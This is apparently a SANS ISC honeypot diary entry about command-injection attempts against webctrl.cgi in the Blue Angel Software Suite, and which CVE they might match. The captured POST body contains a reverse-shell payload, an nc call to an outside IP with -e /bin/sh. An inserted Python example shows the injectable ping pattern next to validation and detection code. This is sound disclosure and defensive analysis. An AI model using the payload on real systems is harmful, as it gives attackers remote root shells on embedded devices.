webctrl.cgi/Blue Angel Software Suite Exploit Attempts. Maybe CVE-2025-34033 Variant?

Published: 2025-10-22. Last Updated: 2025-10-22 14:21:47 UTC
by Johannes Ullrich (Version: 1)

Starting yesterday, some of our honeypots received POST requests to "/cgi-bin/webctrl.cgi", attempting to exploit an OS command injection vulnerability:

POST /cgi-bin/webctrl.cgi
Host: [honeypot ip]:80
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://[honeypot ip]:80
Dnt: 1
Connection: close
Referer: http://[honeypot ip]:80/cgi-bin/webctrl.cgi?action=pingconfig_page
Cookie: userName=admin; state=login; passWord=
Upgrade-Insecure-Requests: 1

action=pingconfig_update&pos_x=0&pos_y=0&login=3&configchanged=0&ip_address=&pingstatereloadflag=1&ipv6=1&ipaddress=;nc%2087.120.191.94%2031331%20-e/bin/sh;&count=3&size=64&start=Start

The vulnerability appears to be a "classic" OS command injection vulnerability. The "ipaddress" parameter is likely passed straight to "ping" in code like 

ping -c {count} -s {size} {ipaddress}

The count and size parameters are easy to validate as they are numbers. The ipaddress parameter is likely supposed to allow for hostnames, making validation a little bit trickier. I talked at length about OS command injection and how to prevent it in a video last year (see https://www.youtube.com/watch?v=7QDO3pZbum8 ).
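To make the validation point concrete, here is an added example (not the diary's code, and not the Blue Angel software's actual implementation) that parses the captured form body, contrasts the suspected shell-string construction with an argv-based one that validates count, size and an IP-or-hostname target, and flags fields carrying shell metacharacters. The parsing helpers, the hostname regex and the RFC 5737 placeholder 192.0.2.1 standing in for the listener address are assumptions of the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed sample: the form body from the honeypot request above, with the
# listener address replaced by the RFC 5737 documentation address 192.0.2.1.
CAPTURED_BODY = (
    "action=pingconfig_update&pos_x=0&pos_y=0&login=3&configchanged=0&ip_address="
    "&pingstatereloadflag=1&ipv6=1&ipaddress=;nc%20192.0.2.1%2031331%20-e/bin/sh;"
    "&count=3&size=64&start=Start"
)

# RFC 1123 hostname label: letters, digits and inner hyphens, 1-63 characters.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{LABEL}\.)*{LABEL}\.?$")
SHELL_META_RE = re.compile(r"[;|&`$(){}<>\\\n\r]")


def parse_body(body):
    """Decode the urlencoded body; split only on '&' so ';' stays inside values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True, separator="&").items()}


def valid_target(value):
    """Accept an IPv4/IPv6 literal or a hostname of at most 253 characters."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME_RE.match(value) is not None


def vulnerable_command(params):
    """The pattern the diary suspects: fields spliced into one shell string."""
    return "ping -c %s -s %s %s" % (params["count"], params["size"], params["ipaddress"])


def hardened_command(params):
    """Validate each field, then return an argv list that never reaches a shell."""
    count, size, target = params["count"], params["size"], params["ipaddress"]
    if not (count.isdigit() and size.isdigit()):
        raise ValueError("count and size must be decimal integers")
    if not valid_target(target):
        raise ValueError("ipaddress must be an IP literal or a hostname")
    return ["ping", "-c", count, "-s", size, target]  # execute via subprocess.run(argv)


def injected_params(params):
    """Detection helper: names of fields that carry shell metacharacters."""
    return sorted(k for k, v in params.items() if SHELL_META_RE.search(v))
```

Run against CAPTURED_BODY, vulnerable_command() yields a string the shell would split at the semicolons into a ping and an nc invocation, while hardened_command() rejects the same input and injected_params() names "ipaddress" as the offending field.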

Identifying the exact vulnerability this request attempts to exploit is not so straightforward.

Searching the National Vulnerability Database (https://nvd.nist.gov) leads to two different vulnerabilities for "webctrl.cgi":

CVE-2021-40351: webctrl.cgi.elf on Christie Digital DWU850-GS V06.46 devices allows attackers to perform any desired action via a crafted query containing an unspecified Cookie header. Authentication bypass can be achieved by including an administrative cookie that the device does not validate.

CVE-2025-34033: An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command.

The first one refers to a cookie header. We would have an "interesting" cookie header, but the exploited vulnerability appears to affect the "pingconfig_update" action, pointing to CVE-2025-34033. However, the detailed description states:

An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command. An authenticated attacker can inject arbitrary commands by appending shell metacharacters to the ping_addr parameter in a crafted GET request to /cgi-bin/webctrl.cgi?action=pingtest_update. The command's output is reflected in the application's web interface, enabling attackers to view results directly. Default and backdoor credentials can be used to access the interface and exploit the issue. Successful exploitation results in arbitrary command execution as the root user.

Our attack uses the 'ipaddress' parameter, not the 'ping_addr' parameter. The NVD entry also suggests this requires a GET request with the action set to 'pingtest_update', not a POST request with an action of 'pingconfig_update'.

There are sadly many similar vulnerabilities. Many IoT/Router appliances have had vulnerabilities in their "ping" implementation in the past that looked exactly like what we have here. In 2019, an exploit was published for CVE-2025-34033 [1]. The vendor behind the software, 5VTech, appears to specialize in VoIP and similar equipment for Broadband networks [2].

There are two options at this point: (a) this is a new version of the CVE-2025-34033 vulnerability, or (b) the attacker messed up. Without a test device, this isn't easy to verify.

[1] https://www.exploit-db.com/exploits/46792
[2] http://www.5vtechnologies.com/

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
